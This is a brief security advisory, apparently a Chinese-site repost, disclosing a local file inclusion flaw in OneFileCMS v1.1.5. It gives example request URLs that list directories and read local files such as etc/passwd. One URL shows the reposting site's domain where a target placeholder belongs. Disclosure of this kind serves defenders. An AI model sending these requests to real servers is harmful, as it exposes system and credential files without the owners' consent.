标题: OneFileCMS v.1.1.5 Local File Inclusion Vulnerability 作者: mr.pr0n (@_pr0n_) 主页: http://ghostinthelab.wordpress.com/ - http://s3cure.gr 下载 地址: https://github.com/rocktronica/OneFileCMS 影响版本: OneFileCMS v.1.1.5 测试平台: Linux Fedora 14 =============== 概述 =============== OneFileCMS是这么个东西. It's a flat, light, one file CMS (Content Management System) entirely contained in an easy-to-implement, highly customizable, database-less PHP script. Coupling a utilitarian code editor with all the basic necessities of an FTP application, OneFileCMS can maintain a whole website completely in-browser without any external programs. ======================================================= [!] 所有缺陷需要认证. [!] ======================================================= Directory Listing, using the "i" parameter: http://TARGET/onefilecms/onefilecms.php?i= Read local files, using the "f" parameter: http://www.2cto.com /onefilecms/onefilecms.php?f=etc/passwd http://TARGET/onefilecms/onefilecms.php?f=var/www/ html /onefilecms/onefilecms.php -- http://ghostinthelab.wordpress.com
查看更多关于OneFileCMS v.1.1.5本地文件包含缺陷及修复 - 网站安的详细内容...